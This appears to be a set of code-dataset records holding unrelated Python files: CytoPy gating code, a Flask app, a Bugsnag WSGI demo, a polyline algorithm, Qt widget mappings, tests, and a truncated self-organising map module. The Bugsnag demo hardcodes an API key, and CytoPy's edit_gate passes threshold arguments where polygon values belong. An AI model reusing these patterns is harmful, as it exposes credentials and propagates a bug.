edit_gate(self,\n gate_name: str,\n x_threshold: float or None = None,\n y_threshold: float or None = None,\n x_values: list or None = None,\n y_values: list or None = None):\n \"\"\"\n Edit an existing gate (i.e. the polygon or threshold shape that generates the resulting\n populations). The altered geometry will be applied to the parent population resulting\n this gate acts upon, resulting in new data. Populations downstream of this edit will\n also be effected but gates will not adapt dynamically, instead the static results of\n gating algorithms will still apply, but to a new dataset. For this reason, gates\n should be checked (similar to the effects of moving a gate in FlowJo).\n\n Parameters\n ----------\n gate_name: str\n x_threshold: float (optional)\n Required for threshold geometries\n y_threshold: float (optional)\n Required for 2D threshold geometries\n x_values: list\n Required for Polygon geometries\n y_values\n Required for Polygon geometries\n Returns\n -------\n None\n \"\"\"\n gate = self.get_gate(gate=gate_name)\n err = \"Cannot edit a gate that has not been applied; gate children not present in population \" \\\n \"tree.\"\n assert all([x in self.filegroup.tree.keys() for x in [c.name for c in gate.children]]), err\n transforms = [gate.transformations.get(x, None) for x in [\"x\", \"y\"]]\n transforms = {k: v for k, v in zip([gate.x, gate.y], transforms) if k is not None}\n parent = self.filegroup.load_population_df(population=gate.parent,\n transform=transforms)\n for child in gate.children:\n pop = self.filegroup.get_population(population_name=child.name)\n if isinstance(pop.geom, ThresholdGeom):\n assert x_threshold is not None, \"For threshold geometry, please provide x_threshold\"\n if pop.geom.y_threshold is not None:\n assert y_threshold is not None, \"For 2D threshold geometry, please provide y_threshold\"\n update_threshold(population=pop,\n parent_data=parent,\n x_threshold=x_threshold,\n y_threshold=y_threshold)\n elif isinstance(pop.geom, PolygonGeom):\n assert x_values is not None and y_values is not None, \\\n \"For polygon gate please provide x_values and y_values\"\n update_polygon(population=pop,\n parent_data=parent,\n x_values=x_threshold,\n y_values=y_threshold)\n self._edit_downstream_effects(population_name=child.name)\n\n def _edit_downstream_effects(self,\n population_name: str):\n \"\"\"\n Echos the downstream effects of an edited gate by iterating over the Population\n dependencies and reapplying their geometries to the modified data. Should be\n called after 'edit_population'.\n\n Parameters\n ----------\n population_name: str\n\n Returns\n -------\n None\n \"\"\"\n downstream_populations = self.filegroup.list_downstream_populations(population=population_name)\n for pop in downstream_populations:\n pop = self.filegroup.get_population(pop)\n transforms = {k: v for k, v in zip([pop.geom.x, pop.geom.y],\n [pop.geom.transform_x, pop.geom.transform_y])\n if k is not None}\n parent = self.filegroup.load_population_df(population=pop.parent,\n transform=transforms)\n if isinstance(pop.geom, ThresholdGeom):\n update_threshold(population=pop,\n parent_data=parent,\n x_threshold=pop.geom.x_threshold,\n y_threshold=pop.geom.y_threshold)\n elif isinstance(pop.geom, PolygonGeom):\n update_polygon(population=pop,\n parent_data=parent,\n x_values=pop.geom.x_values,\n y_values=pop.geom.y_values)\n\n def _control_gate(self,\n gate: Gate or ThresholdGate or PolygonGate or EllipseGate):\n \"\"\"\n Internal method for applying a gate using control data. Will first attempt to fetch the parent\n population for the control data (see CytoPy.data.fcs.FileGroup.load_ctrl_population_df)\n and then will fit the gate to this data. The resulting gate will be applied statically to\n the parent population from the primary data.\n\n Parameters\n ----------\n gate: Gate or ThresholdGate or PolygonGate or EllipseGate\n\n Returns\n -------\n list\n List of Populations\n \"\"\"\n assert gate.ctrl in self.filegroup.controls, f\"FileGroup does not have data for {gate.ctrl}\"\n ctrl_parent_data = self.filegroup.load_ctrl_population_df(ctrl=gate.ctrl,\n population=gate.parent,\n transform=None)\n # Fit control data\n populations = gate.fit_predict(data=ctrl_parent_data)\n updated_children = list()\n for p in populations:\n eq_child = [c for c in gate.children if c.name == p.population_name]\n assert len(eq_child) == 1, \"Invalid gate. Estimated populations do not match children.\"\n eq_child = eq_child[0]\n eq_child.geom = p.geom\n updated_children.append(eq_child)\n gate.children = updated_children\n # Predict original data\n parent_data = self.filegroup.load_population_df(population=gate.parent,\n transform=None,\n label_downstream_affiliations=False)\n return gate.fit_predict(data=parent_data)\n\n def save(self, *args, **kwargs):\n \"\"\"\n Save GatingStrategy and the populations generated for the associated\n FileGroup.\n\n Parameters\n ----------\n args:\n Positional arguments for mongoengine.document.save call\n kwargs:\n Keyword arguments for mongoengine.document.save call\n\n Returns\n -------\n None\n \"\"\"\n for g in self.gates:\n g.save()\n super().save(*args, **kwargs)\n if self.name not in self.filegroup.gating_strategy:\n self.filegroup.gating_strategy.append(self.name)\n if self.filegroup is not None:\n self.filegroup.save()\n\n def delete(self,\n delete_gates: bool = True,\n remove_associations: bool = True,\n *args, **kwargs):\n \"\"\"\n Delete gating strategy. If delete_gates is True, then associated Gate objects will\n also be deleted. If remove_associations is True, then populations generated from\n this gating strategy will also be deleted.\n\n Parameters\n ----------\n delete_gates: bool (default=True)\n remove_associations: (default=True)\n args:\n Positional arguments for mongoengine.document.delete call\n kwargs:\n Keyword arguments for mongoengine.document.delete call\n\n Returns\n -------\n\n \"\"\"\n super().delete(*args, **kwargs)\n populations = [[c.name for c in g.children] for g in self.gates]\n populations = list(set([x for sl in populations for x in sl]))\n if delete_gates:\n self.print(\"Deleting gates...\")\n for g in self.gates:\n g.delete()\n if remove_associations:\n self.print(\"Deleting associated populations in FileGroups...\")\n for f in progress_bar(FileGroup.objects(), verbose=self.verbose):\n if self.name in f.gating_strategy:\n f.gating_strategy = [gs for gs in f.gating_strategy if gs != self.name]\n f.delete_populations(populations=populations)\n f.save()\n self.print(f\"{self.name} successfully deleted.\")\n","sub_path":"CytoPy/data/gating_strategy.py","file_name":"gating_strategy.py","file_ext":"py","file_size_in_byte":32569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"246623815","text":"#!/usr/bin/python3\n'''\nmodule states\n'''\nfrom flask import Flask\nfrom flask import render_template\nfrom models import storage\nfrom models.state import State\n\napp = Flask(__name__)\n\n\n@app.route('/states_list', strict_slashes=False)\ndef states_list():\n ''' states list '''\n states_dict = storage.all(State)\n states = []\n for k, v in states_dict.items():\n states.append(v)\n print(states)\n return render_template('7-states_list.html', states=states)\n\n\n@app.teardown_appcontext\ndef teardown_db(self):\n ''' teardown_db '''\n storage.close()\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"web_flask/7-states_list.py","file_name":"7-states_list.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"640108454","text":"\"\"\"\nCreated on Fri Sep 25 2020\n\nAn implementation of Player to define a Football player.\n\nUnlike other subclasses this one defines a lot of stuff since we need to know a lot of information about Football\nPlayers\n\n@author: alexa\n\"\"\"\n\nfrom player.player import Player\n\n\nclass FootballPlayer(Player):\n \"\"\"\n Defines a Football Player. Besides the basic attributes set by the Player class we'll have plenty of\n attributes which define characteristics rather specific to football\n\n Attributes\n ----------\n name : str\n The player's name\n nationality : str\n The player's nationality\n strength : int\n The player's overall strength, or talent when it comes to playing Football. Defined with a\n basic scale going from 0 to 100 in mind, where the average Football player in one of Europe's\n top leagues (England/Spain/Germany/Italy) would be around 75\n penaltyTaker : bool\n Indicates if the player normally takes penalties\n positionAbilities : list of float\n The list of ability of the player to play at each post. Contains 4 elements: the ability to\n play as a goalkeeper, defender, midfielder and forward, respectively. The abilities are\n multipliers ranging from 0 to 1 (both included). If ability for a post is >0, then the player\n can play at this position and his strength there will be position ability * strength\n goalsScored : int\n Number of goals scored by the player\n\n Methods\n -------\n Will probably need something to help a Team convert to XML (the team will need the player's data)\n increaseGS : int -> None\n Increases goalsScored by the quantity given in attribute\n resetGoals : None -> None\n Resets goalScored to 0\n \"\"\"\n\n def __init__(self, player_data):\n \"\"\"\n Initializes a FootballPlayer from data given by the FootballClub constructor, which reads an XML file\n\n Parameters\n ----------\n player_data : xml.etree.ElementTree.Element\n The data defining the player as read in then XML file. It's an XML node\n\n Returns\n -------\n FootballPlayer\n The initialized FootballPlayer\n \"\"\"\n super().__init__(player_data)\n self.strength = 0\n self.penaltyTaker = False\n self.positionAbilities = [0, 0, 0, 0]\n self.goalsScored = 0\n\n raw_elements = list(player_data)\n for e in raw_elements:\n if e.tag == 'name':\n self.name = e.text\n elif e.tag == 'country':\n self.nationality = e.text\n elif e.tag == 'strength':\n self.strength = int(e.text)\n elif e.tag == 'pen_shooter':\n self.penaltyTaker = (e.text == \"Yes\")\n elif e.tag == 'goals':\n self.goalsScored = int(e.text)\n elif e.tag == 'gk_ability':\n self.positionAbilities[0] = float(e.text)\n elif e.tag == 'df_ability':\n self.positionAbilities[1] = float(e.text)\n elif e.tag == 'md_ability':\n self.positionAbilities[2] = float(e.text)\n elif e.tag == 'fw_ability':\n self.positionAbilities[3] = float(e.text)\n else:\n print(\"Unknown data in the player data ! Ignoring....\")\n","sub_path":"player/football_player.py","file_name":"football_player.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"83748616","text":"#!/usr/bin/env python\n\nimport bugsnag\nfrom werkzeug.wrappers import Request, Response\nfrom bugsnag.wsgi.middleware import BugsnagMiddleware\n\nfrom wsgiref.simple_server import make_server\nfrom cgi import parse_qs, escape\n\n# Create our wsgi app\ndef application(environ, start_response):\n if environ.get('PATH_INFO', '') == \"/\":\n d = parse_qs(environ['QUERY_STRING'])\n\n bugsnag.notify(RuntimeError('octopus'))\n start_response('200 OK', [('Content-Type', 'text/html')])\n raise Exception(\"Something broke\")\n\n return [\"Some output here\"]\n\n elif environ.get('PATH_INFO', '') == \"/upload\":\n\n start_response('200 OK', [('Content-Type', 'text/html')])\n return ['
']\n\n elif environ.get('PATH_INFO', '') == \"/uploaded\":\n\n print(Request(environ).form)\n\n raise RuntimeError('hi')\n\n else:\n start_response('404 NOT FOUND', [('Content-Type', 'text/plain')])\n return ['Not Found']\n\n# Configure bugsnag\nbugsnag.configure(api_key=\"066f5ad3590596f9aa8d601ea89af845\")\n\n# Add bugsnag wsgi middleware to app\napplication = BugsnagMiddleware(application)\n\n# Start a server\nprint(\"listening on :8051\")\nhttpd = make_server('localhost', 8051, application)\nhttpd.serve_forever()\n","sub_path":"wsgi/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"559257679","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 9 01:55:14 2019\n\n@author: Daniel\n@author: Imanol Luengo (https://stackoverflow.com/a/37744549/1905613)\n\"\"\"\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import imshow, pause\nimport numpy as np\nfrom sklearn.neighbors import NearestNeighbors\nimport networkx as nx\nimport math\nfrom collections import defaultdict\nfrom skimage.transform import rescale\nfrom scipy.spatial import distance_matrix\nfrom scipy.sparse.csgraph import minimum_spanning_tree, depth_first_order\nfrom dfs import longest_undirected_weighted_path\nimport cv2\nfrom skimage.morphology import skeletonize\nfrom sklearn.neighbors import kneighbors_graph\nimport random\n\n\ndef is_outlier(data, z_score_cutoff = 2.0):\n \"\"\"Uses Robust/Modified Z-score method with Median Absolute Deviation for robust univariate outlier estimation.\n Returns a list of booleans that indicate if element is an outlier.\n z_score_cutoff is the number of MAD deviations the point must exceed to be considered an outlier.\n Fallback to MeanAD in case MAD == 0. 1.486 and 1.253314 approximate standard deviation. Why? Unknown.\n See https://www.ibm.com/support/knowledgecenter/SSEP7J_11.1.0/com.ibm.swg.ba.cognos.ug_ca_dshb.doc/modified_z.html\"\"\"\n diff = np.abs(data - np.median(data))\n MAD = np.median(diff)\n MeanAD = np.mean(diff)\n is_outlier = [False] * len(data)\n \n if MAD != 0:\n z_score = diff / (1.486 * MAD )\n else:\n z_score = diff / (1.253314 * MeanAD)\n \n is_outlier = z_score >= z_score_cutoff\n return is_outlier\n\n#disallow edges between points on boundary\ndef ordered_line_from_unordered_points_tree(points_tuple, dimensions, minimum_points, settings):\n \"\"\" Algorithm for extracting a single \"correct\" polyline from pixel edge probablity mask.\n \"\"\"\n# print('\\t\\t\\t\\t' + 'ordered_line_from_unordered_points_tree')\n x = points_tuple[0]\n y = points_tuple[1]\n points = np.c_[x, y]\n k = max(minimum_points - 1, int(np.floor(len(points) * .75)))\n distances = distance_matrix(points, points)\n adjacency_matrix = np.zeros((len(points), len(points)))\n# distances -= 1.0\n mean_cluster_distances = []\n k_closest_indices_list = []\n# min_neighbor_distance = 3\n for row in range(len(distances)):\n k_closest_indices = np.argpartition(distances[row,:], k)[:k]\n# k_nearest_distances = distances[row, k_closest_indices]\n# nearest_distance = distances[row, k_closest_indices[1]] #ensure at least 2 nearby vertices\n adjacency_matrix[row, k_closest_indices] = 1\n# mean_cluster_distances.append(np.mean(k_nearest_distances))\n# k_closest_indices_list.append(k_closest_indices)\n \n indices = list(range(len(x)))\n positions = list(zip(-y, x))\n node_positions = dict(zip(indices, positions))\n# dense_graph_nx = nx.from_numpy_matrix(adjacency_matrix)\n# plt.figure(300 + random.randint(1,500))\n# nx.draw_networkx(dense_graph_nx, pos=node_positions, with_labels=False, node_size = 15)\n# plt.show()\n \n #Eliminate small seperated clusters (outliers/noise)\n# outlier_mask = is_outlier(mean_cluster_distances, z_score_cutoff)\n# print(mean_cluster_distances)\n# for row in range(len(distances)):\n# if outlier_mask[row]:\n# k_closest_indices = k_closest_indices_list[row]\n# adjacency_matrix[row, k_closest_indices] = 0\n \n #use sqrt to penalize large jumps (shorter distances like 1 are given more weight,\n #longer distances reduced more, but longer overall distances are still preserved)\n distances = np.log(distances + 1) * adjacency_matrix\n \n \n mst = minimum_spanning_tree(distances)\n \n \n \n \n #plot intermediate\n # mst_nx = nx.from_scipy_sparse_matrix(mst)\n # plt.figure(800 + random.randint(1,250))\n # nx.draw_networkx(mst_nx, pos=node_positions, with_labels=False, node_size = 15)\n # plt.show()\n \n \n rows, cols = mst.nonzero()\n #penalize long distances after the mst creation\n #this ensures that jumps can still be made, but must connect a reasonable number of new edge\n #in order to account for negative weighting\n #Note, this can't be done before the mst calculation since this would prevent the actual \n #mst from being effectively found\n #zero point is when the distance weighting starts being negative.\n #power is the exponential penalty for longer distances.\n zero_point = 5 if 'polyline_zero_point' not in settings else settings['polyline_zero_point']\n power = 1.5 if 'polyline_distance_power' not in settings else settings['polyline_distance_power']\n new_distances = np.power(zero_point, power) - np.power(np.power(np.e, mst[rows, cols]) - 1, power)\n mst[rows, cols] = np.ravel(new_distances)\n \n# mst[rows, cols] = mst[rows, cols] - np.min([np.min(mst[rows, cols]), 0])\n \n #mst_nx = nx.from_scipy_sparse_matrix(mst)\n #plt.figure(1050 + random.randint(1,250))\n #nx.draw_networkx(mst_nx, pos=node_positions, with_labels=False, node_size = 15)\n #plt.show()\n \n #Symmetrize matrix to make undriected\n mst = mst + mst.T - np.diag(mst.diagonal())\n mst_array = np.squeeze(np.asarray(mst))\n #Find longest path\n# print(mst_array)\n length, path_indices = longest_undirected_weighted_path(mst_array)\n \n xx = x[path_indices]\n yy = y[path_indices]\n \n # Create an image to draw the lines on\n image = np.zeros((dimensions[0], dimensions[1], 3))\n \n # Recast the x and y points into usable format for cv2.fillPoly()\n pts = np.vstack((yy,xx)).astype(np.int32).T\n \n # Draw the lane onto the warped blank image\n# plt.plot(left_fitx, ploty, color='yellow')\n cv2.polylines(image, [pts], False, (255, 0, 0), 1)#higher thickness may be necessary, but ddecreases accuracy...\n# image = image[:,:,0]\n# print(pts)\n# image_rescaled = rescale(image, 2, anti_aliasing=False)\n# plt.figure(1300 + random.randint(1,500))\n# plt.imshow(image_rescaled)\n# plt.show()\n \n# edge_bianry = np.where(image > 127.0, 1.0, 0.0)\n# skeleton = skeletonize(edge_bianry)\n# skeleton = np.where(skeleton > 0.5, 255.0, 0.0)\n# edge_bianry[:,:,0] = skeleton\n# plt.figure(1800 + random.randint(1,500))\n# plt.imshow(image)\n# plt.show()\n # image = edge_bianry\n# pause(1)\n# plt.show()\n \n #If start point is further from 0, 0 than end point, reverse.\n start_dist = np.linalg.norm([xx[0], yy[0]])\n end_dist = np.linalg.norm([xx[-1], yy[-1]])\n if start_dist > end_dist:\n xx = np.flip(xx)\n yy = np.flip(yy)\n \n return xx, yy, image\n","sub_path":"postprocessing/ordered_line_from_unordered_points.py","file_name":"ordered_line_from_unordered_points.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"25912780","text":"import csv\n\nebird = 'Ixothraupis guttata'\n\n\ndef search_bySpecies():\n\n with open('request_species.csv', 'r') as csv_file:\n csv_reader = csv.reader(csv_file)\n\n for row in csv_reader:\n print(row[1])\n\n\nsearch_bySpecies()\n","sub_path":".history/demo_20191008085550.py","file_name":"demo_20191008085550.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"277169826","text":"\"\"\"Object to keep track of which widget class should be used for each BfObject or FbxObject\n\nThis can be subclassed for DCC implementations to add more custom widgets.\n\n\"\"\"\nimport fbx\nfrom brenfbx.core import bfCore\nfrom brenpy.core import bpDebug\nfrom brenfbx.qt import bfQtCore\n\n# bf object imports\nfrom brenfbx.fbxsdk.core import bfObject\nfrom brenfbx.objects import bfCustomObjects\nfrom brenfbx.objects.evaluators import bfEvaluators\nfrom brenfbx.objects.evaluators import bfModifiers\nfrom brenfbx.fbxsdk.scene.constraint import bfConstraint\nfrom brenfbx.fbxsdk.scene.constraint import bfConstraintAim\n\n# widget imports\nfrom brenfbx.qt.object import bfQtObjectWidgets\nfrom brenfbx.qt.object import bfCustomObjectWidgets\nfrom brenfbx.qt.object import bfQtNodeWidgets\nfrom brenfbx.qt.constraint import bfQtConstraintWidgets\nfrom brenfbx.qt.object.evaluation_objects import bfQtEvaluationObjectWidgets\nfrom brenfbx.qt.object.evaluation_objects import bfQtModifierWidgets\n\nBF_MAPPING = [\n # bf objects\n # (bfCustomObjects.BfNoteObject, bfCustomObjectWidgets.BfNoteObjectEditorWidget),\n # (bfCustomObjects.BfSceneFilterObject, bfCustomObjectWidgets.BfSceneFilterObjectEditorWidget),\n # # modifiers\n # (bfModifiers.BfAlignPositionModifier, bfQtModifierWidgets.BfAlignPositionModifierEditorWidget),\n # (bfModifiers.BfAlignRotationModifier, bfQtModifierWidgets.BfAlignRotationModifierEditorWidget),\n # (bfModifiers.BfAimModifier, bfQtModifierWidgets.BfAimModifierEditorWidget),\n # (bfModifiers.BfPreRotateModifier, bfQtModifierWidgets.BfPreRotationModifierEditorWidget),\n # (bfModifiers.BfRotateOrderModifier, bfQtModifierWidgets.BfRotateOrderModifierEditorWidget),\n # (bfModifiers.BfRotateToPreRotateModifier, bfQtModifierWidgets.BfNodeModifierEditorWidget),\n # (bfModifiers.BfAddChildModifier, bfQtModifierWidgets.BfAddChildModifierEditorWidget),\n # # constraints\n # (bfConstraint.BfConstraintParent, bfQtConstraintWidgets.BfConstraintParentEditorWidget),\n # (bfConstraint.BfConstraintAim, bfQtConstraintWidgets.BfConstraintAimEditorWidget),\n # (bfConstraint.BfConstraintPosition, bfQtConstraintWidgets.BfConstraintPositionEditorWidget),\n # (bfConstraint.BfConstraintRotation, bfQtConstraintWidgets.BfConstraintRotationEditorWidget),\n # (bfConstraint.BfConstraintScale, bfQtConstraintWidgets.BfConstraintScaleEditorWidget),\n # # node modifier default\n # (bfModifiers.BfNodeModifier, bfQtModifierWidgets.BfNodeModifierEditorWidget),\n # # evaluation objects\n (bfEvaluators.BfFbxBuild, bfQtEvaluationObjectWidgets.BfFbxBuildEditorWidget),\n (bfEvaluators.BfEvaluationGroup, bfQtEvaluationObjectWidgets.BfEvaluationGroupEditorWidget),\n # (bfObject.BfEvaluationObject, bfQtObjectWidgets.BfEvaluationObjectEditorWidget),\n]\n\nFBX_MAPPING = [\n # (fbx.FbxConstraintParent, bfQtConstraintWidgets.BfConstraintParentEditorWidget),\n # (fbx.FbxConstraintAim, bfQtConstraintWidgets.BfConstraintAimEditorWidget),\n # (fbx.FbxConstraintPosition, bfQtConstraintWidgets.BfConstraintPositionEditorWidget),\n # (fbx.FbxConstraintRotation, bfQtConstraintWidgets.BfConstraintRotationEditorWidget),\n # (fbx.FbxConstraintScale, bfQtConstraintWidgets.BfConstraintScaleEditorWidget),\n # (fbx.FbxNode, bfQtNodeWidgets.BfNodeEditorWidget),\n # (fbx.FbxSkeleton, bfQtNodeWidgets.BfSkeletonEditorWidget),\n # anything else defaults to FbxObjectEditorWidget\n (fbx.FbxObject, bfQtObjectWidgets.BfObjectEditorWidget),\n]\n\n\nBF_AE_MAPPING = [\n # bf objects\n (bfCustomObjects.BfNoteObject, bfCustomObjectWidgets.BfNoteObjectAEWidget),\n (bfCustomObjects.BfSceneFilterObject, bfCustomObjectWidgets.BfSceneFilterObjectAEWidget),\n # modifiers\n (bfModifiers.BfAlignPositionModifier, bfQtModifierWidgets.BfAlignPositionModifierAEWidget),\n (bfModifiers.BfAlignRotationModifier, bfQtModifierWidgets.BfAlignRotationModifierAEWidget),\n (bfModifiers.BfAimModifier, bfQtModifierWidgets.BfAimModifierAEWidget),\n (bfModifiers.BfPreRotateModifier, bfQtModifierWidgets.BfPreRotationModifierAEWidget),\n (bfModifiers.BfRotateOrderModifier, bfQtModifierWidgets.BfRotateOrderModifierAEWidget),\n (bfModifiers.BfRotateToPreRotateModifier, bfQtModifierWidgets.BfNodeModifierAEWidget),\n (bfModifiers.BfAddChildModifier, bfQtModifierWidgets.BfAddChildModifierAEWidget),\n # constraints\n (bfConstraint.BfConstraintParent, bfQtConstraintWidgets.BfConstraintParentAEWidget),\n (bfConstraintAim.BfConstraintAim, bfQtConstraintWidgets.BfConstraintAimAEWidget),\n (bfConstraint.BfConstraintPosition, bfQtConstraintWidgets.BfConstraintPositionAEWidget),\n (bfConstraint.BfConstraintRotation, bfQtConstraintWidgets.BfConstraintRotationAEWidget),\n (bfConstraint.BfConstraintScale, bfQtConstraintWidgets.BfConstraintScaleAEWidget),\n # node modifier default\n (bfModifiers.BfNodeModifier, bfQtModifierWidgets.BfNodeModifierAEWidget),\n # evaluation objects\n (bfEvaluators.BfFbxBuild, bfQtEvaluationObjectWidgets.BfFbxBuildAEWidget),\n (bfEvaluators.BfEvaluationGroup, bfQtEvaluationObjectWidgets.BfEvaluationGroupAEWidget),\n (bfObject.BfEvaluationObject, bfQtObjectWidgets.BfEvaluationObjectAEWidget),\n]\n\nFBX_AE_MAPPING = [\n (fbx.FbxConstraintParent, bfQtConstraintWidgets.BfConstraintParentAEWidget),\n (fbx.FbxConstraintAim, bfQtConstraintWidgets.BfConstraintAimAEWidget),\n (fbx.FbxConstraintPosition, bfQtConstraintWidgets.BfConstraintPositionAEWidget),\n (fbx.FbxConstraintRotation, bfQtConstraintWidgets.BfConstraintRotationAEWidget),\n (fbx.FbxConstraintScale, bfQtConstraintWidgets.BfConstraintScaleAEWidget),\n (fbx.FbxNode, bfQtNodeWidgets.BfNodeAEWidget),\n (fbx.FbxSkeleton, bfQtNodeWidgets.BfSkeletonAEWidget),\n]\n\n\ndef get_object_ae_widget_class(bf_object, bf_mapping=None, fbx_mapping=None):\n \"\"\"Find appropriate object attributes editor widget class.\n \"\"\"\n if bf_mapping is None:\n bf_mapping = BF_AE_MAPPING\n if fbx_mapping is None:\n fbx_mapping = FBX_AE_MAPPING\n\n # first look for custom bf object widget\n for bf_cls, ae_widget_cls in bf_mapping:\n if isinstance(bf_object, bf_cls):\n return ae_widget_cls\n\n # if we're not using a custom bf object widget then find fbx object widget\n for fbx_cls, ae_widget_cls in fbx_mapping:\n if isinstance(bf_object.fbx_object(), fbx_cls):\n return ae_widget_cls\n\n # if we don't find a mapped editor then simply return None to indicate there's nothing we want to edit\n return None\n\nclass BfObjectWidgetMapping(\n bfQtCore.BfQtWidgetMappingBase\n):\n\n def __init__(self, *args, **kwargs):\n super(BfObjectWidgetMapping, self).__init__(*args, **kwargs)\n\n self._bf_object_widget_mapping = BF_MAPPING\n self._bf_object_ae_widget_mapping = BF_AE_MAPPING\n self._fbx_object_widget_mapping = FBX_MAPPING\n self._fbx_object_ae_widget_mapping = FBX_AE_MAPPING\n\n def bf_object_widget_mapping(self):\n return self._bf_object_widget_mapping\n\n def bf_object_ae_widget_mapping(self):\n return self._bf_object_ae_widget_mapping\n\n def add_bf_object_widget_mapping(self, value):\n\n # check value\n err_msg = \"object mapping must be tuple of (BfObject, BfObjectWidget)\"\n\n if not isinstance(value, (list, tuple)):\n raise bfCore.BfError(err_msg)\n if len(value) != 2:\n raise bfCore.BfError(err_msg)\n if not isinstance(value[0], bfCore.BfObjectBase):\n raise bfCore.BfError(err_msg)\n if not isinstance(value[1], bfQtObjectWidgets.BfObjectEditorWidget):\n raise bfCore.BfError(err_msg)\n\n self._bf_object_widget_mapping.append(tuple(value))\n return True\n\n def fbx_object_widget_mapping(self):\n return self._fbx_object_widget_mapping\n\n def get_object_editor_widget_class(self, bf_object):\n \"\"\"Find appropriate object editor widget class.\n\n Choose from mapping of object class to object editor widgets\n items towards the top of this list will take presidence over ones below\n FbxObject should always be last in the list to serve as default editor\n\n Or override this method in a subclass to return custom editors based,\n with super as the fallback default.\n \"\"\"\n # first look for custom bf object widget\n for bf_cls, editor_cls in self._bf_object_widget_mapping:\n if isinstance(bf_object, bf_cls):\n return editor_cls\n\n # if we're not using a custom bf object widget then find fbx object widget\n for fbx_cls, editor_cls in self._fbx_object_widget_mapping:\n if isinstance(bf_object.fbx_object(), fbx_cls):\n return editor_cls\n\n # redundant error, in theory getting to this point should be impossible\n raise bfQtCore.BfQtError(\"Failed to find suitable object editor class: {} {} {}\".format(\n bf_object.fbx_object().GetName(), bf_object, bf_object.fbx_object()\n ))\n\n def get_object_ae_widget_class(self, bf_object):\n \"\"\"Find appropriate object attributes editor widget class.\n \"\"\"\n return get_object_ae_widget_class(\n bf_object,\n bf_mapping=self._bf_object_ae_widget_mapping,\n fbx_mapping=self._fbx_object_ae_widget_mapping\n )\n","sub_path":"python/brenfbx/qt/object/bfObjectWidgetMapping.py","file_name":"bfObjectWidgetMapping.py","file_ext":"py","file_size_in_byte":9304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"149853357","text":"\"\"\"Test file for search File\"\"\"\nfrom unittest import TestCase\n\nfrom rawsec_cli.search import searchProject\nfrom rawsec_cli.search import searchProjectCTF\nfrom rawsec_cli.search import searchProjectOperating\nfrom rawsec_cli.search import searchProjectResources\nfrom rawsec_cli.search import searchProjectTools\n\n\nclass TestSearch(TestCase):\n \"\"\"Test search class\"\"\"\n\n def setUp(self):\n \"\"\"setup test\"\"\"\n self.json = {\n \"tools\": {\"binary_exploitation\": {\"tools\": [{\"name\": \"tools\"}]}},\n \"resources\": {\n \"binary_exploitation\": {\"resources\": [{\"name\": \"resources\"}]},\n },\n \"operating_systems\": {\n \"binary_exploitation\": {\n \"operating_systems\": [{\"os\": \"operating_systems\"}],\n },\n },\n \"ctf_platforms\": {\n \"binary_exploitation\": {\n \"ctf_platforms\": [{\"name\": \"ctf_platforms\"}],\n },\n },\n }\n\n def testSearchProjectTools(self):\n \"\"\"test searchProjectTools function\"\"\"\n self.assertEqual(\n searchProjectTools(self.json, \"tools\"),\n [{\"name\": \"tools\"}],\n )\n\n def testSearchProjectResources(self):\n \"\"\"test searchProjectResources function\"\"\"\n self.assertEqual(\n searchProjectResources(self.json, \"resources\"),\n [{\"name\": \"resources\"}],\n )\n\n def testSearchProjectCTF(self):\n \"\"\"test searchProjectCTF function\"\"\"\n self.assertEqual(\n searchProjectCTF(self.json, \"ctf_platforms\"),\n [{\"name\": \"ctf_platforms\"}],\n )\n\n def testSearchProjectOperating(self):\n \"\"\"test searchProjectOperating function\"\"\"\n self.assertEqual(\n searchProjectOperating(self.json, \"operating_systems\"),\n [{\"os\": \"operating_systems\"}],\n )\n\n def testSearchProject(self):\n \"\"\"test searchProject function\"\"\"\n self.assertEqual(\n searchProject(self.json, \"tools\"),\n [{\"name\": \"tools\"}],\n )\n","sub_path":"tests/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"617190672","text":"import csv\nfrom math import sqrt\n\nfrom numpy import (array, unravel_index, nditer, linalg, random, subtract, max,\n power, exp, pi, zeros, ones, arange, outer, meshgrid, dot,\n logical_and, mean, std, cov, argsort, linspace, transpose,\n einsum, prod, nan, sqrt, hstack, diff, argmin, multiply)\nfrom numpy import sum as npsum\nfrom numpy.linalg import norm\nfrom collections import defaultdict, Counter\nfrom warnings import warn\nfrom sys import stdout\nfrom time import time\nfrom datetime import timedelta\nimport pickle\nimport os\nimport math\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom numpy.testing import assert_almost_equal, assert_array_almost_equal\nfrom numpy.testing import assert_array_equal\nimport unittest\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing as pre\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport cv2\n\"\"\"\n Minimalistic implementation of the Self Organizing Maps (SOM).\n\"\"\"\n\n\ndef _build_iteration_indexes(data_len, num_iterations,\n verbose=True, random_generator=None):\n \"\"\"Returns an iterable with the indexes of the samples\n to pick at each iteration of the training.\n\n If random_generator is not None, it must be an instalce\n of numpy.random.RandomState and it will be used\n to randomize the order of the samples.\"\"\"\n iterations = arange(num_iterations) % data_len\n if random_generator:\n random_generator.shuffle(iterations)\n if verbose:\n return _wrap_index__in_verbose(iterations)\n else:\n return iterations\n\n\ndef _wrap_index__in_verbose(iterations):\n \"\"\"Yields the values in iterations printing the status on the stdout.\"\"\"\n m = len(iterations)\n digits = len(str(m))\n progress = 